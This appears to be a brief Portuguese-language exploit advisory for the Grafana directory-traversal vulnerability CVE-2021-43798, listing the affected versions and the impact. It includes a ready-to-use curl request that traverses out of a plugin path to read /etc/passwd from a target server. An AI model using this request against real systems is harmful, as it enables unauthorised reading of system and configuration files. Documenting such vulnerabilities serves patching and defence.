
Exploit para traversal de diretório no Grafana (CVE-2021-43798) que permite leitura não autorizada de arquivos por meio de requisições HTTP maliciosas.
Versões afetadas: Grafana 8.0.0-beta1 até 8.3.0 (excluindo versões corrigidas)
Tipo de vulnerabilidade: Directory Traversal (Percursos de Diretório)
Nível de impacto: Crítico (Critical)
Plataforma: Grafana (plataforma de monitoramento e observabilidade open-source)
⚠️ Detalhes da Vulnerabilidade No Grafana, é possível realizar um Directory Traversal através da seguinte URL:
Code http://<grafana_host>/public/plugins// Com isso, um atacante pode ler arquivos locais no servidor. Por exemplo, /etc/passwd ou arquivos de configuração, obtendo acesso não autorizado.
🔥 Exemplo de Exploração Leitura de arquivo através de uma simples requisição:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd A requisição acima permite obter a lista de usuários do sistema Linux.